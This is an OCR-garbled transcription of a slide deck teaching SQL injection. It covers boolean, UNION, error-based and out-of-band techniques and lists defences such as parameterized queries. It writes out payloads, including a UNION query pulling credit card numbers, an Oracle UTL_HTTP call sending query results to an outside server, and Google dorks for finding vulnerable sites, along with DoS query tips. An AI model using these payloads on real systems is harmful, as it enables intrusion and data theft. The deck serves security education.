SQL Injec*on. By Robin Gonzalez

Transcription

1 SQL Injec*on By Robin Gonzalez

2

3 Some things that can go wrong Excessive and Unused Privileges Privilege Abuse Input Injec>on Malware Week Audit Trail

4 Other things that can go wrong Storage Media Exposure Exploita>on of Vulnerable Databases Unmanaged Sensi>ve Data Denial of Service Limited Security Exper>se

5 SQL Injec*on in a nutshell Type 1 Type 2

6 Defini*on An SQL injec>on akack consists of inser>on or "injec>on" of either a par>al or complete SQL query via the data input or transmiked from the client (browser) to the web applica>on. A SQL injec>on can: read sensi>ve data, modify database data, execute administra>on opera>ons on the DB, write into the file system and in some cases issue commands to the OS.

7 Basic examples Example of a dynamic SQL query. SELECT >tle, text FROM news WHERE id=$id User supplies 10 or 1=1 SELECT >tle, text FROM news WHERE id=10 or 1=1

8 Classes of SQLIA In- band data is extracted using the same channel that is used to inject the SQL code. Out- of- band data is retrieved using a different channel (e.g., an ). Inferen>al or Blind - the tester observes the resul=ng behavior of the DB from par=cular queries.

9 Techniques to exploit SQL Union operator - The UNION operator is used in SQL injec=ons to join two queries. Boolean use boolean logic to verify that certain condi=ons are true or false. Error based forces the DB to generate an error, giving the adversary informa=on upon which to refine their injec=on. Out- of- band technique used to retrieve data with another channel.

10 Interac*on with databases An adversary first needs to understand when the applica>on interacts with a DB server to access data. Typical examples are: Authen>ca>on forms most likely checked against a DB with usernames and passwords. Search engines string inpuler by user used in SQL query to extract all relevant records in the DB. E- commerce sites the products and their characteris=cs are likely stored in a DB.

11 Tes*ng for SQL injec*on We can use a single quote (') or a semicolon (;) to the field or parameter under test. The first is used in SQL as a string terminator and, if not filtered by the applica=on, would lead to an incorrect query. A very simple but effec>ve technique is to insert a string where a number is expected.

12 Boolean- based exploita*on hkp://widgetshop.com/widget/?id=1 and 1=2 What could happen? (1) excep>on, and (2) no record, developers assume. hkp://widgetshop.com/widget/?id=1?id=1 and ( select top 1 substring(name, 1, 1) from sysobjects where id=( select top 1 id from ( select top 1 id from sysobjects where xtype='u' order by id ) sq order by id desc ) ) = 'a'

13 Union Exploita*on SELECT Name, Phone, Address FROM Users WHERE Id=$id We will set the $id value with the following query: $id=1 UNION SELECT creditcardnumber,1,1 FROM CreditCardTable Which will join the result of the original query with all the credit card numbers in the CreditCardTable table.

14 Error Based Exploita*on SELECT * FROM products WHERE id_product=$id_product hkp:// UTL_INADDR.GET_HOST_NAME( (SELECT user FROM DUAL) )- - ORA : host SCOTT unknown Then the tester can manipulate the parameter passed to GET_HOST_NAME() func=on and the result will be shown in the error message.

15 Out of band Exploita*on SELECT * FROM products WHERE id_product=$id_product hkp:// UTL_HTTP.request( testerserver.com:80 (SELECT user FROM DUAL)- - This Oracle func>on will try to connect to testerserver and make a HTTP GET request containing the return from the query SELECT user FROM DUAL. The tester can set up a webserver (e.g. Apache) or use the Netcat tool:

16 Google dorks We can easily find list of Google dorks that an adversary can use to find a vulnerable site. Let s try to find a site vulnerable to SQL injec>on. Search for inurl:index.php?id= and then akach a at the end of the URL. If the page results in an error then it is vulnerable to SQL injec>on.

17 Demo of a SQLIA hkps:// LFK1c

18 Defending Against SQLIA Do not blindly trust inputs. Create error messages with care. Keep databases and applica>ons fully patched. Implement network monitoring tools. Implement filtering tools.

19 Defending Against SQLIA Prepared Statements (Parameterized Queries). Stored procedures. Escaping all user supplied input. Proper privileges. White list input valida>on.

20 DoS It is easy for a malicious user or bot to create havoc by execu>ng long running and CPU intensive queries against your database. If crated correctly an effec>ve SQL DOS akack could cause your system to become unavailable for a period of >me.

21 DoS The longer the string being matched the longer the query execu>on >me. Combining pakerns in an OR statement will increase the execu>on >me. Adding % around the search string will increase the effec>veness especially at the beginning of the string as it will prevent any available index from being used.

22 Kerberos and Cybersafe Kerberos is a free trusted third- party authen>ca>on system that was created by the MIT. Kerberos presumes that the third party is secure and provides single sign- on capabili>es, centralized password storage, and database link authen>ca>on. With only one centralized password store, it reduces the administra>ve overhead and requires users to remember only one password. It also enables user database links.